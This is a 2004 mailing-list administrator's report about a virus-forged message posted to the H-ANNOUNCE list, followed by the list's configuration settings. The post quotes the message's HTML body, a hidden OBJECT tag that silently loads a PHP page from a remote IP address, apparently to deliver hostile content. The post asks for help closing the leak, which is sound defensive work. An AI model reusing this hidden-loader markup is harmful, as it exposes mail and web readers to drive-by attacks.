Over the weekend, the following was posted to one of our lists. It was
presumably forged by a virus; the From address was a legit editor of
the list. I've filed off the e-mail addresses on general principle.
Date: Sun, 21 Mar 2004 01:44:56 -0800
Reply-To: ...
Sender: ...
From: ...
Subject: Incoming message
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="http://66.169.99.119:81/563373.php">
</OBJECT></body></html>
The list in question in set "Attachments= No" and "Language= NoHTML".
The header appears below.
Anyone have a suggestion about how it got posted? I'd like to close
the leak.
Dennis Boone
H-Net
* List-ID= H-ANNOUNCE
* Ack= Yes
* Attachments= No
* Auto-Delete= yes,semi-auto,delay(5),max(100),Probe(15)
* Change-Log= Yes
* Confidential= No
* Daily-Threshold= 50
* Default-Options= FullHdr,Repro,MIME
* Delivery-Pool= P,C
* Digest=yes,same,daily,00:00,size(2000)
* Editor-Header= Yes
* Errors-To= ...
* Files= No
* Language= NoHTML
* Newsgroups= None
* Notebook= Yes,/lists/h-announce,Weekly,(H-ANNOUNCE)
* Notify= Yes
* Renewal= None
* Reply-to= List,Respect
* Review= Owner
* Send= Editor
* Stats= Normal,Private
* Subscription= open,confirm
* Validate= No
* Editor= ...
* Owner= ...
|